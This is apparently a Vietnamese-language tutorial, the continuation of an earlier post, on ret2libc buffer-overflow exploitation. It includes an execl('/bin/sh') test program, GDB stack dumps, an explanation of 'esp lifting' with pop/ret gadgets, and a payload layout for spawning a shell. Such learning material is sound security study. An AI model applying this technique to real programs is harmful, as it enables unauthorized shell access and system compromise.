Ret2libc ( tiep theo)

Trong bai truoc chung ta da co the invoke dc shell trong GDB bang cach set cac gia tri tai nhung diem ma chung ta co the dieu khien dc. Tuy nhien phuong phap do se rat kho thanh cong boi vi rat kho xac dinh chinh xac dia chi cua /bin/sh de hardcode vao ( co the brute force ) cho nen chung ta se chuyen sang mot cach khac thiet thuc hon.

#include
#include
/*
*
* Chuong trinh nay de xac dinh cach dua thong so vao ham execl
* Ngay truoc khi call execl, stack se chia dia chi cua chuoi "/bin/sh"
*/
int main()
{
execl("/bin/sh","aaaaaaa",0);
}

suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ gcc CallExecl.c -o CallExecl3
CallExecl.c: In function 'main':
CallExecl.c:10: warning: incompatible implicit declaration of built-in function 'execl'
CallExecl.c:10: warning: missing sentinel in function call
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ ./CallExecl3
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ exit
exit
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ cat|./CallExecl3
id
uid=1000(suto) gid=1004(suto) groups=10(wheel),18(audio),27(video),100(users),1004(suto),1007(vboxusers)
^C

Boi vi viec tim ra dia chi chinh xac cua "/bin/sh" la kha kho cho nen chung ta can 1 cach nao do de lay chinh xac dia chi nay!
Thong thuong se co mot con tro to toi dau cua buffer . Trong bai harder nay co 2 con tro nhu vay.

gdb$ x/20x $esp
0xbffff350: 0x0804b000 0x00000128 0x00000000 0x00000000
0xbffff360: 0x00004827 0x00000000 0xb7fcaffc 0xb7fcc840
0xbffff370: 0x0804b008 0xbffff3bc 0xb7f058ba 0xb7fcc840
0xbffff380: 0x0804b008 0x0000011e 0xb7fcf000 0x00000008

Va sau khi overflow :

Breakpoint 2, 0x08048509 in func ()
gdb$ x/20x $ebp

0xbffff488: 0x0000000a 0x0804b008 0x00000000 0xb8000ce0
gdb$ x/s 0x0804b008
0x804b008: "A"*260

Nhu vay chung ta thay rang sau khi overflow van con 1 con tro tro ve dau buffer. Voi thi nghiem luc ban dau chung ta co the thuc hien :

execl("/bin/sh",[something],[something]

Cau hoi la lam cach nao dua esp tro vao dung noi chua con tro nay, boi vi ngay sau luc tran no se tro ve dia chi ma chung ta ghi de!
TOm lai chung ta can esp tai thoi diem goi execl:

esp : something 0x0804b008 something something

Su dung phuong phap esp lifting se lam dc dieu nay.
Phuong phap nay thuc hien dua tren 2 lenh lien tuc la pop & ret . Pop se dich. esp lui len tren va ret se return ve gia tri. da dc pop ra .

Co nghia la stack se nhu the nay :

RET RET RET RET2Execl Something PTR

Lenh RET cuoi cung se dua chung ta vao` Execl dong` thoi dua esp tro toi :

ESP Something PTR

Tuc la thoa man yeu cau chung ta!

Chuoi pop ret thi rat quen thuoc! Do vay. chung ta se xay dung chuoi khai thac nhu sau :


[/bin/sh\x00][A*N][RET2popret*n][Execl]

Phan tiep theo chung ta se xay dung chuong trinh khai thac loi tran bo dem thong qua ret2execl